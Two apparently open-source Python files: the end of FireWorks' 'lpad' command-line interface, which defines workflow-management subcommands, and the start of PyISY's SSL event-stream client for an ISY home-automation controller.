orphaned_fw_ids.append(fw_id)
fws = get_fws_helper(lp, orphaned_fw_ids, args)
if args.remove:
lp.m_logger.info('Found {} orphaned fw_ids: {}'.format(
len(orphaned_fw_ids), orphaned_fw_ids))
lp.delete_fws(orphaned_fw_ids, delete_launch_dirs=args.delete_launch_dirs)
else:
print(args.output(fws))
def get_output_func(format):
if format == "json":
return lambda x: json.dumps(x, default=DATETIME_HANDLER, indent=4)
else:
return lambda x: yaml.safe_dump(recursive_dict(x, preserve_unicode=False),
default_flow_style=False)
def arg_positive_int(value):
try:
ivalue = int(value)
if ivalue < 1:
raise ValueError()
except ValueError:
raise ArgumentTypeError("{} is not a positive integer".format(value))
return ivalue
def lpad():
m_description = 'A command line interface to FireWorks. For more help on a specific command, ' \
'type "lpad <command> -h".'
parser = ArgumentParser(description=m_description)
parent_parser = ArgumentParser(add_help=False)
parser.add_argument("-o", "--output", choices=["json", "yaml"],
default="json", type=lambda s: s.lower(),
help="Set output display format to either json or YAML. "
"YAML is easier to read for long documents. JSON is the default.")
subparsers = parser.add_subparsers(help='command', dest='command')
# This makes common argument options easier to maintain. E.g., what if
# there is a new state or disp option?
# NOTE: Those sets of standard options are not used consistently below (jotelha)
fw_id_args = ["-i", "--fw_id"]
fw_id_kwargs = {"type": str, "help": "fw_id"}
state_args = ['-s', '--state']
state_kwargs = {"type": lambda s: s.upper(), "help": "Select by state.",
"choices": list(Firework.STATE_RANKS.keys())}
disp_args = ['-d', '--display_format']
disp_kwargs = {"type": lambda s: s.lower(), "help": "Display format.",
"default": "less",
"choices": ["all", "more", "less", "ids", "count",
"reservations"]}
# enhanced display options allow for value 'none' or None (default) for no output
enh_disp_args = copy.deepcopy(disp_args)
enh_disp_kwargs = copy.deepcopy(disp_kwargs)
enh_disp_kwargs["choices"].append("none")
enh_disp_kwargs["default"] = None
query_args = ["-q", "--query"]
query_kwargs = {"help": 'Query (enclose pymongo-style dict in '
'single-quotes, e.g. \'{"state":"COMPLETED"}\')'}
launches_mode_args = ["-lm", "--launches_mode"]
launches_mode_kwargs = {"action": "store_true",
"help": 'Query the launches collection (enclose pymongo-style '
'dict in single-quotes, e.g. \'{"launch_id": 1}\')'}
qid_args = ["--qid"]
qid_kwargs = {"help": "Query by reservation id of job in queue"}
# for using fw- and wf-specific options on one command line, distinguish by prefix fw and wf
# prefix short one-dash options with 'wf', i.e. '-i' -> '-wfi'
# prefix long two-dash options with 'wf_', i.e. '--fw_id' -> '--wf_fw_id'
wf_prefixed_fw_id_args = [re.sub('^-([^-].*)$', '-wf\\1', s) for s in fw_id_args]
wf_prefixed_fw_id_args = [re.sub('^--(.*)$', '--wf_\\1', s) for s in wf_prefixed_fw_id_args]
wf_prefixed_state_args = [re.sub('^-([^-].*)$', '-wf\\1', s) for s in state_args]
wf_prefixed_state_args = [re.sub('^--(.*)$', '--wf_\\1', s) for s in wf_prefixed_state_args]
wf_prefixed_query_args = [re.sub('^-([^-].*)$', '-wf\\1', s) for s in query_args]
wf_prefixed_query_args = [re.sub('^--(.*)$', '--wf_\\1', s) for s in wf_prefixed_query_args]
# prefix short one-dash options with 'fw', i.e. '-i' -> '-fwi'
# prefix long two-dash options with 'fw_', i.e. '--fw_id' -> '--fw_fw_id'
fw_prefixed_fw_id_args = [re.sub('^-([^-].*)$', '-fw\\1', s) for s in fw_id_args]
fw_prefixed_fw_id_args = [re.sub('^--(.*)$', '--fw_\\1', s) for s in fw_prefixed_fw_id_args]
fw_prefixed_state_args = [re.sub('^-([^-].*)$', '-fw\\1', s) for s in state_args]
fw_prefixed_state_args = [re.sub('^--(.*)$', '--fw_\\1', s) for s in fw_prefixed_state_args]
fw_prefixed_query_args = [re.sub('^-([^-].*)$', '-fw\\1', s) for s in query_args]
fw_prefixed_query_args = [re.sub('^--(.*)$', '--fw_\\1', s) for s in fw_prefixed_query_args]
# filter all long options, i.e. '--fw_id' and strip off preceding '--'
fw_id_options = [re.sub('^--(.*)$', '\\1', opt)
for opt in [*fw_id_args, *wf_prefixed_fw_id_args, *fw_prefixed_fw_id_args]
if re.match('^--.*$', opt)]
version_parser = subparsers.add_parser(
'version',
help='Print the version and location of FireWorks')
version_parser.set_defaults(func=version)
init_parser = subparsers.add_parser(
'init', help='Initialize a Fireworks launchpad YAML file.')
init_parser.add_argument('-u', '--uri_mode',
action="store_true",
help="Connect via a URI, see: "
"https://docs.mongodb.com/manual/reference/connection-string/")
init_parser.add_argument('--config-file', default=DEFAULT_LPAD_YAML,
type=str,
help="Filename to write to.")
init_parser.set_defaults(func=init_yaml)
reset_parser = subparsers.add_parser('reset', help='reset and re-initialize the FireWorks database')
reset_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required to protect against accidental reset.")
reset_parser.set_defaults(func=reset)
addwf_parser = subparsers.add_parser('add', help='insert a Workflow from file')
addwf_parser.add_argument('-d', '--dir',
action="store_true",
help="Directory mode. Finds all files in the "
"paths given by wf_file.")
addwf_parser.add_argument('wf_file', nargs="+",
help="Path to a Firework or Workflow file")
addwf_parser.add_argument('-c', '--check', help='check the workflow before adding', dest='check',
action='store_true')
addwf_parser.set_defaults(func=add_wf, check=False)
check_wf_parser = subparsers.add_parser('check_wflow', help='check a workflow from launchpad')
check_wf_parser.add_argument('-i', '--fw_id', type=int, help='the id of a firework from the workflow')
check_wf_parser.set_defaults(func=check_wf)
get_launchdir_parser = subparsers.add_parser('get_launchdir',
help='get the directory of the most recent launch of the given fw_id.'
' A common usage is "cd `get_launchdir <FW_ID>`" to change the '
'working directory that of the FW launch')
get_launchdir_parser.add_argument('fw_id', type=int, help='fw_id to chdir to')
get_launchdir_parser.add_argument('--launch_idx', type=int,
help='the index of the launch to get (default of -1 is most recent launch)',
default=-1)
get_launchdir_parser.set_defaults(func=get_launchdir)
append_wf_parser = subparsers.add_parser('append_wflow',
help='append a workflow from file to a workflow on launchpad')
append_wf_parser.add_argument(*fw_id_args, type=fw_id_kwargs["type"], help='parent firework ids')
append_wf_parser.add_argument('-f', '--wf_file', help='path to a firework or workflow file')
append_wf_parser.add_argument('-d', '--detour', help='append workflow as a detour', dest='detour',
action='store_true')
append_wf_parser.add_argument('--no_pull_spec_mods', help='do not to pull spec mods from parent',
dest='pull_spec_mods', action='store_false')
append_wf_parser.set_defaults(func=append_wf, detour=False, pull_spec_mods=True)
dump_wf_parser = subparsers.add_parser('dump_wflow', help='dump a workflow from launchpad to a file')
dump_wf_parser.add_argument('-i', '--fw_id', type=int, help='the id of a firework from the workflow')
dump_wf_parser.add_argument('-f', '--wf_file', help='path to a local file to store the workflow')
dump_wf_parser.set_defaults(func=dump_wf)
addscript_parser = subparsers.add_parser('add_scripts', help='quickly add a script '
'(or several scripts) to run in sequence')
addscript_parser.add_argument('scripts', help="Script to run, or space-separated names", nargs='*')
addscript_parser.add_argument('-n', '--names', help='Firework name, or space-separated names', nargs='*')
addscript_parser.add_argument('-w', '--wf_name', help='Workflow name')
addscript_parser.add_argument('-d', '--delimiter', help='delimiter for separating scripts', default=',')
addscript_parser.set_defaults(func=add_scripts)
get_fw_parser = subparsers.add_parser(
'get_fws', help='get information about FireWorks')
get_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
get_fw_parser.add_argument('-n', '--name', help='get FWs with this name')
get_fw_parser.add_argument(*state_args, **state_kwargs)
get_fw_parser.add_argument(*query_args, **query_kwargs)
get_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
get_fw_parser.add_argument(*qid_args, **qid_kwargs)
get_fw_parser.add_argument(*disp_args, **disp_kwargs)
get_fw_parser.add_argument('-m', '--max', help='limit results', default=0,
type=int)
get_fw_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
get_fw_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
get_fw_parser.set_defaults(func=get_fws)
get_fw_in_wf_parser = subparsers.add_parser(
'get_fws_in_wflows', help='get information about FireWorks in Workflows')
get_fw_in_wf_parser.add_argument(*wf_prefixed_fw_id_args, **fw_id_kwargs)
get_fw_in_wf_parser.add_argument('-wfn', '--wf_name', help='get WFs with this name')
get_fw_in_wf_parser.add_argument(*wf_prefixed_state_args, **state_kwargs)
get_fw_in_wf_parser.add_argument(*wf_prefixed_query_args, **query_kwargs)
get_fw_in_wf_parser.add_argument(*fw_prefixed_fw_id_args, **fw_id_kwargs)
get_fw_in_wf_parser.add_argument('-fwn', '--fw_name', help='get FWs with this name')
get_fw_in_wf_parser.add_argument(*fw_prefixed_state_args, **state_kwargs)
get_fw_in_wf_parser.add_argument(*fw_prefixed_query_args, **query_kwargs)
get_fw_in_wf_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
get_fw_in_wf_parser.add_argument(*qid_args, **qid_kwargs)
get_fw_in_wf_parser.add_argument(*disp_args, **disp_kwargs)
get_fw_in_wf_parser.add_argument('-m', '--max', help='limit results', default=0,
type=int)
get_fw_in_wf_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
get_fw_in_wf_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
get_fw_in_wf_parser.set_defaults(func=get_fws_in_wfs)
trackfw_parser = subparsers.add_parser('track_fws', help='Track FireWorks')
trackfw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
trackfw_parser.add_argument('-n', '--name', help='name')
trackfw_parser.add_argument(*state_args, **state_kwargs)
trackfw_parser.add_argument(*query_args, **query_kwargs)
trackfw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
trackfw_parser.add_argument('-c', '--include', nargs="+",
help='only include these files in the report')
trackfw_parser.add_argument('-x', '--exclude', nargs="+",
help='exclude these files from the report')
trackfw_parser.add_argument('-m', '--max', help='limit results', default=0, type=int)
trackfw_parser.set_defaults(func=track_fws)
rerun_fws_parser = subparsers.add_parser('rerun_fws', help='re-run Firework(s)')
rerun_fws_parser.add_argument(*fw_id_args, **fw_id_kwargs)
rerun_fws_parser.add_argument('-n', '--name', help='name')
rerun_fws_parser.add_argument(*state_args, **state_kwargs)
rerun_fws_parser.add_argument(*query_args, **query_kwargs)
rerun_fws_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
rerun_fws_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
rerun_fws_parser.add_argument('--task-level', action='store_true', help='Enable task level recovery')
rerun_fws_parser.add_argument('-lid', '--launch_id', nargs='+',
help='Recover launch id. --task-level must be given', default=None, type=int)
recover_mode_group = rerun_fws_parser.add_mutually_exclusive_group()
recover_mode_group.add_argument('-cp', '--copy-data', action='store_const', const='cp',
dest='recover_mode',
help='Copy data from previous run. --task-level must be given')
recover_mode_group.add_argument('-pd', '--previous-dir', action='store_const', const='prev_dir',
dest='recover_mode',
help='Reruns in the previous folder. --task-level must be given')
rerun_fws_parser.set_defaults(func=rerun_fws)
defuse_fw_parser = subparsers.add_parser('defuse_fws', help='cancel (de-fuse) a single Firework')
defuse_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
defuse_fw_parser.add_argument('-n', '--name', help='name')
defuse_fw_parser.add_argument(*state_args, **state_kwargs)
defuse_fw_parser.add_argument(*query_args, **query_kwargs)
defuse_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
defuse_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
defuse_fw_parser.set_defaults(func=defuse_fws)
pause_fw_parser = subparsers.add_parser('pause_fws', help='pause a single Firework')
pause_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
pause_fw_parser.add_argument('-n', '--name', help='name')
pause_fw_parser.add_argument(*state_args, **state_kwargs)
pause_fw_parser.add_argument(*query_args, **query_kwargs)
pause_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
pause_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
pause_fw_parser.set_defaults(func=pause_fws)
reignite_fw_parser = subparsers.add_parser('reignite_fws', help='reignite (un-cancel) a set of Fireworks')
reignite_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
reignite_fw_parser.add_argument('-n', '--name', help='name')
reignite_fw_parser.add_argument(*state_args, **state_kwargs)
reignite_fw_parser.add_argument(*query_args, **query_kwargs)
reignite_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
reignite_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
reignite_fw_parser.set_defaults(func=reignite_fws)
resume_fw_parser = subparsers.add_parser('resume_fws', help='resume (un-pause) a set of Fireworks')
resume_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
resume_fw_parser.add_argument('-n', '--name', help='name')
resume_fw_parser.add_argument(*state_args, **state_kwargs)
resume_fw_parser.add_argument(*query_args, **query_kwargs)
resume_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
resume_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
resume_fw_parser.set_defaults(func=resume_fws)
update_fws_parser = subparsers.add_parser(
'update_fws', help='Update a Firework spec.')
update_fws_parser.add_argument(*fw_id_args, **fw_id_kwargs)
update_fws_parser.add_argument('-n', '--name', help='get FWs with this name')
update_fws_parser.add_argument(*state_args, **state_kwargs)
update_fws_parser.add_argument(*query_args, **query_kwargs)
update_fws_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
update_fws_parser.add_argument("-u", "--update", type=str,
help='Doc update (enclose pymongo-style dict '
'in single-quotes, e.g. \'{'
'"_tasks.1.hello": "world"}\')')
update_fws_parser.add_argument("--mongo", default=False, action='store_true',
help="Use full pymongo style dict to modify spec. "
"Be very careful as you can break your spec")
update_fws_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
update_fws_parser.set_defaults(func=update_fws)
get_wf_parser = subparsers.add_parser(
'get_wflows', help='get information about Workflows')
get_wf_parser.add_argument(*fw_id_args, **fw_id_kwargs)
get_wf_parser.add_argument('-n', '--name', help='get WFs with this name')
get_wf_parser.add_argument(*state_args, **state_kwargs)
get_wf_parser.add_argument(*query_args, **query_kwargs)
get_wf_parser.add_argument(*disp_args, **disp_kwargs)
get_wf_parser.add_argument('-m', '--max', help='limit results', default=0, type=int)
get_wf_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
get_wf_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
get_wf_parser.add_argument('-t', '--table',
help='Print results in table form instead of '
'json. Needs prettytable. Works best '
'with "-d less"',
action="store_true")
get_wf_parser.set_defaults(func=get_wfs)
defuse_wf_parser = subparsers.add_parser('defuse_wflows', help='cancel (de-fuse) an entire Workflow')
defuse_wf_parser.add_argument('--defuse_all_states', help='also defuse COMPLETED and FIZZLED workflows',
action='store_true')
defuse_wf_parser.add_argument(*fw_id_args, **fw_id_kwargs)
defuse_wf_parser.add_argument('-n', '--name', help='name')
defuse_wf_parser.add_argument(*state_args, **state_kwargs)
defuse_wf_parser.add_argument(*query_args, **query_kwargs)
defuse_wf_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} entries.".
format(PW_CHECK_NUM))
defuse_wf_parser.set_defaults(func=pause_wfs)
pause_wf_parser = subparsers.add_parser('pause_wflows', help='pause an entire Workflow')
pause_wf_parser.add_argument(*fw_id_args, **fw_id_kwargs)
pause_wf_parser.add_argument('-n', '--name', help='name')
pause_wf_parser.add_argument(*state_args, **state_kwargs)
pause_wf_parser.add_argument(*query_args, **query_kwargs)
pause_wf_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} entries.".
format(PW_CHECK_NUM))
pause_wf_parser.set_defaults(func=pause_wfs)
reignite_wfs_parser = subparsers.add_parser('reignite_wflows',
help='reignite (un-cancel) an entire Workflow')
reignite_wfs_parser.add_argument(*fw_id_args, **fw_id_kwargs)
reignite_wfs_parser.add_argument('-n', '--name', help='name')
reignite_wfs_parser.add_argument(*state_args, **state_kwargs)
reignite_wfs_parser.add_argument(*query_args, **query_kwargs)
reignite_wfs_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
reignite_wfs_parser.set_defaults(func=reignite_wfs)
archive_parser = subparsers.add_parser('archive_wflows', help='archive an entire Workflow (irreversible)')
archive_parser.add_argument(*fw_id_args, **fw_id_kwargs)
archive_parser.add_argument('-n', '--name', help='name')
archive_parser.add_argument(*state_args, **state_kwargs)
archive_parser.add_argument(*query_args, **query_kwargs)
archive_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
archive_parser.set_defaults(func=archive)
delete_wfs_parser = subparsers.add_parser(
'delete_wflows', help='Delete workflows (permanently). Use "archive_wflows" instead if '
'you want to "soft-remove"')
delete_wfs_parser.add_argument(*fw_id_args, **fw_id_kwargs)
delete_wfs_parser.add_argument('-n', '--name', help='name')
delete_wfs_parser.add_argument(*state_args, **state_kwargs)
delete_wfs_parser.add_argument(*query_args, **query_kwargs)
delete_wfs_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
delete_wfs_parser.add_argument('--ldirs', help="the launch directories associated with the WF will "
"be deleted as well, if possible", dest="delete_launch_dirs",
action='store_true')
delete_wfs_parser.set_defaults(func=delete_wfs, delete_launch_dirs=False)
get_qid_parser = subparsers.add_parser('get_qids', help='get the queue id of a Firework')
get_qid_parser.add_argument(*fw_id_args, **fw_id_kwargs)
get_qid_parser.set_defaults(func=get_qid)
cancel_qid_parser = subparsers.add_parser('cancel_qid', help='cancel a reservation')
cancel_qid_parser.add_argument(*qid_args, **qid_kwargs)
cancel_qid_parser.set_defaults(func=cancel_qid)
reservation_parser = subparsers.add_parser('detect_unreserved', help='Find launches with stale reservations')
reservation_parser.add_argument('--time', help='expiration time (seconds)',
default=RESERVATION_EXPIRATION_SECS, type=int)
reservation_parser.add_argument('--rerun', help='cancel and rerun expired reservations', action='store_true')
reservation_parser.add_argument(*enh_disp_args, **enh_disp_kwargs)
reservation_parser.set_defaults(func=detect_unreserved)
fizzled_parser = subparsers.add_parser('detect_lostruns',
help='Find launches that have FIZZLED')
fizzled_parser.add_argument('--time', help='expiration time (seconds)',
default=RUN_EXPIRATION_SECS,
type=int)
fizzled_parser.add_argument('--fizzle', help='mark lost runs as fizzled', action='store_true')
fizzled_parser.add_argument('--rerun', help='rerun lost runs', action='store_true')
fizzled_parser.add_argument('--refresh', help='refresh the detected inconsistent fireworks',
action='store_true')
fizzled_parser.add_argument('--max_runtime', help='max runtime, matching failures ran no longer '
'than this (seconds)', type=int)
fizzled_parser.add_argument('--min_runtime', help='min runtime, matching failures must have run '
'at least this long (seconds)', type=int)
fizzled_parser.add_argument('-q', '--query',
help='restrict search to only FWs matching this query')
fizzled_parser.add_argument('-lq', '--launch_query',
help='restrict search to only launches matching this query')
fizzled_parser.add_argument(*enh_disp_args, **enh_disp_kwargs)
fizzled_parser.set_defaults(func=detect_lostruns)
priority_parser = subparsers.add_parser('set_priority', help='modify the priority of one or more FireWorks')
priority_parser.add_argument('priority', help='get FW with this fw_id', default=None, type=int)
priority_parser.add_argument(*fw_id_args, **fw_id_kwargs)
priority_parser.add_argument('-n', '--name', help='name')
priority_parser.add_argument(*state_args, **state_kwargs)
priority_parser.add_argument(*query_args, **query_kwargs)
priority_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
priority_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
priority_parser.add_argument('-wf', action='store_true',
help='the priority will be set for all the fireworks of the matching workflows')
priority_parser.set_defaults(func=set_priority)
parser.add_argument('-l', '--launchpad_file', help='path to LaunchPad file containing '
'central DB connection info',
default=None)
parser.add_argument('-c', '--config_dir',
help='path to a directory containing the LaunchPad file (used if -l unspecified)',
default=CONFIG_FILE_DIR)
parser.add_argument('--logdir', help='path to a directory for logging')
parser.add_argument('--loglvl', help='level to print log messages', default='INFO')
parser.add_argument('-s', '--silencer', help='shortcut to mute log messages', action='store_true')
webgui_parser = subparsers.add_parser('webgui', help='launch the web GUI')
webgui_parser.add_argument("--port", dest="port", type=int, default=WEBSERVER_PORT,
help="Port to run the web server on (default: 5000 or WEBSERVER_PORT arg in "
"FW_config.yaml)")
webgui_parser.add_argument("--host", dest="host", type=str, default=WEBSERVER_HOST,
help="Host to run the web server on (default: 127.0.0.1 or WEBSERVER_HOST arg in "
"FW_config.yaml)")
webgui_parser.add_argument('--debug', help='print debug messages', action='store_true')
webgui_parser.add_argument('-s', '--server_mode', help='run in server mode (skip opening the browser)',
action='store_true')
webgui_parser.add_argument('--nworkers', type=arg_positive_int, help='Number of worker processes for server mode')
webgui_parser.add_argument('--fwquery', help='additional query filter for FireWorks as JSON string')
webgui_parser.add_argument('--wflowquery', help='additional query filter for Workflows as JSON string')
webgui_parser.add_argument('--webgui_username',
help='Optional username needed to access webgui', type=str, default=None)
webgui_parser.add_argument('--webgui_password',
help='Optional password needed to access webgui', type=str, default=None)
webgui_parser.set_defaults(func=webgui)
recover_parser = subparsers.add_parser('recover_offline', help='recover offline workflows')
recover_parser.add_argument('-i', '--ignore_errors', help='ignore errors', action='store_true')
recover_parser.add_argument('-w', '--fworker_file', help='path to fworker file. An empty string '
'will match all the workers', default=FWORKER_LOC)
recover_parser.add_argument('-pe', '--print-errors', help='print errors', action='store_true')
recover_parser.set_defaults(func=recover_offline)
forget_parser = subparsers.add_parser('forget_offline', help='forget offline workflows')
forget_parser.add_argument('-n', '--name', help='name')
forget_parser.add_argument(*state_args, **state_kwargs)
forget_parser.add_argument(*query_args, **query_kwargs)
forget_parser.set_defaults(func=forget_offline)
# admin commands
admin_parser = subparsers.add_parser('admin', help='Various db admin commands, '
'type "lpad admin -h" for more.',
parents=[parent_parser])
admin_subparser = admin_parser.add_subparsers(title="action",
dest="action_command")
maintain_parser = admin_subparser.add_parser('maintain', help='Run database maintenance')
maintain_parser.add_argument('--infinite', help='loop infinitely', action='store_true')
maintain_parser.add_argument('--maintain_interval', help='sleep time between maintenance loops (infinite mode)',
default=MAINTAIN_INTERVAL, type=int)
maintain_parser.set_defaults(func=maintain)
orphaned_parser = admin_subparser.add_parser('orphaned', help='Find orphaned FireWorks')
orphaned_parser.add_argument(*fw_id_args, **fw_id_kwargs)
orphaned_parser.add_argument('-n', '--name', help='get FWs with this name')
orphaned_parser.add_argument(*state_args, **state_kwargs)
orphaned_parser.add_argument(*query_args, **query_kwargs)
orphaned_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
orphaned_parser.add_argument(*qid_args, **qid_kwargs)
orphaned_parser.add_argument(*disp_args, **disp_kwargs)
orphaned_parser.add_argument('-m', '--max', help='limit results', default=0,
type=int)
orphaned_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
orphaned_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
orphaned_parser.add_argument('--remove', help='delete orphaned',
action='store_true')
orphaned_parser.add_argument('--ldirs', help="the launch directories "
"associated with the orphaned Fireworks will "
"be deleted as well, if possible",
dest="delete_launch_dirs",
action='store_true')
orphaned_parser.set_defaults(func=orphaned)
tuneup_parser = admin_subparser.add_parser('tuneup',
help='Tune-up the database (should be performed during '
'scheduled downtime)')
tuneup_parser.add_argument('--full', help='Run full tuneup and compaction (should be run during '
'DB downtime only)', action='store_true')
tuneup_parser.set_defaults(func=tuneup)
refresh_parser = admin_subparser.add_parser('refresh', help='manually force a workflow refresh '
'(not usually needed)')
refresh_parser.add_argument(*fw_id_args, **fw_id_kwargs)
refresh_parser.add_argument('-n', '--name', help='name')
refresh_parser.add_argument(*state_args, **state_kwargs)
refresh_parser.add_argument(*query_args, **query_kwargs)
refresh_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
refresh_parser.set_defaults(func=refresh)
unlock_parser = admin_subparser.add_parser('unlock', help='manually unlock a workflow that is '
'locked (only if you know what you are doing!)')
unlock_parser.add_argument(*fw_id_args, **fw_id_kwargs)
unlock_parser.add_argument('-n', '--name', help='name')
unlock_parser.add_argument(*state_args, **state_kwargs)
unlock_parser.add_argument(*query_args, **query_kwargs)
unlock_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} entries.".format(PW_CHECK_NUM))
unlock_parser.set_defaults(func=unlock)
report_parser = subparsers.add_parser('report', help='Compile a report of runtime stats, '
'type "lpad report -h" for more options.')
report_parser.add_argument("-c", "--collection", help="The collection to report on; "
"choose from 'fws' (default), "
"'wflows', or 'launches'.", default="fws")
report_parser.add_argument('-i', '--interval', help="Interval on which to split the report. "
"Choose from 'minutes', 'hours', "
"'days' (default), 'months', or 'years'.", default="days")
report_parser.add_argument("-n", "--num_intervals", help="The number of intervals on which to "
"report (default=5)", type=int, default=5)
report_parser.add_argument('-q', '--query', help="Additional Pymongo queries to filter entries "
"before processing.")
report_parser.set_defaults(func=report)
introspect_parser = subparsers.add_parser('introspect', help='Introspect recent runs to pin down errors')
introspect_parser.add_argument('-m', '--max', help='examine past <max> results', default=100, type=int)
introspect_parser.add_argument('-t', '--threshold',
help='controls signal to noise ratio, e.g., 10 means '
'difference of at least 10 runs between fizzled/completed count',
default=10, type=int)
introspect_parser.set_defaults(func=introspect)
try:
import argcomplete
argcomplete.autocomplete(parser)
# This supports bash autocompletion. To enable this, pip install
# argcomplete, activate global completion, or add
# eval "$(register-python-argcomplete lpad)"
# into your .bash_profile or .bashrc
except ImportError:
pass
args = parser.parse_args()
args.output = get_output_func(args.output)
if args.command is None:
# if no command supplied, print help
parser.print_help()
else:
for opt in fw_id_options:
if hasattr(args, opt) and getattr(args, opt) is not None and \
isinstance(getattr(args, opt), six.string_types):
if "," in getattr(args, opt):
setattr(args, opt, [int(x) for x in getattr(args, opt).split(",")])
else:
setattr(args, opt, [int(getattr(args, opt))])
args.func(args)
if __name__ == '__main__':
lpad()
|
eventsSSL.py
|
import base64
import datetime
import socket
import select
import ssl
import sys
from threading import Thread
import xml
from xml.dom import minidom
from PyISY.Events import strings
POLL_TIME = 5
class SSLEventStream(object):
def __init__(self, parent, lost_fun=None):
#super(EventStream, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
self.parent = parent
self._running = False
self._reader = None
self._writer = None
self._thread = None
self._subscribed = False
self._connected = False
self._lasthb = None
self._hbwait = 0
self._lostfun = lost_fun
# pull neccessary connection data
auth_data = {'user': self.parent.conn._username,
'passwd': self.parent.conn._password}
self.data = {}
authstr = '{user}:{passwd}'.format(**auth_data)
try:
self.data['auth'] = base64.encodestring(authstr).strip()
except TypeError:
authstr = bytes(authstr, 'ascii')
self.data['auth'] = base64.encodebytes(authstr) \
.strip().decode('ascii')
self.data['addr'] = self.parent.conn._address
self.data['port'] = int(self.parent.conn._port)
self.data['passwd'] = self.parent.conn._password
self.data['tls'] = self.parent.conn._tls_ver
# create TLS encrypted socket
if self.data['tls'] == 1.1:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
#context.verify_mode = ssl.CERT_OPTIONAL
context.check_hostname = False
self.socket = context.wrap_socket \
(socket.socket(socket.AF_INET, socket.SOCK_STREAM),
server_hostname='https://{}'.format(self.data['addr']))
def _NIYerror(self):
raise NotImplementedError('Function not available while '
+ 'socket is closed.')
def _mkmsg(self, msg):
head = msg['head']
body = msg['body']
body = body.format(**self.data)
length = len(body)
head = head.format(length=length, **self.data)
return head + body
def _routemsg(self, msg):
# check xml formatting
try:
xmldoc = minidom.parseString(msg)
except xml.parsers.expat.ExpatError:
self.parent.log.warning('ISY Received Malformed XML:\n' + msg)
return
self.parent.log.debug('ISY Update Received:\n' + msg)
# direct the event message
try:
cntrl = xmldoc.getElementsByTagName('control')[0].firstChild.toxml()
except IndexError:
# No control tag
pass
else:
if cntrl == '_0': # ISY HEARTBEAT
self._lasthb = datetime.datetime.now()
self._hbwait = int(xmldoc.getElementsByTagName('action')[0].
firstChild.toxml())
self.parent.log.debug('ISY HEARTBEAT: ' + self._lasthb.isoformat())
if cntrl == 'ST': # NODE UPDATE
self.parent.nodes._upmsg(xmldoc)
if cntrl[0] != '_': # NODE CONTROL EVENT
self.parent.nodes._controlmsg(xmldoc)
elif cntrl == '_11': # WEATHER UPDATE
if self.parent.configuration['Weather Information']:
self.parent.climate._upmsg(xmldoc)
elif cntrl == '_1': # VARIABLE OR PROGRAM UPDATE
if '<var' in msg: # VARIABLE
self.parent.variables._upmsg(xmldoc)
elif '<id>' in msg: # PROGRAM
self.parent.programs._upmsg(xmldoc)
else: # SOMETHING HAPPENED WITH A PROGRAM FOLDER
# but they ISY didn't tell us what, so...
self.parent.programs.update()
# A wild stream id appears!
if 'sid=' in msg and 'sid' not in self.data:
self._upmsg(xmldoc)
def _upmsg(self, xmldoc):
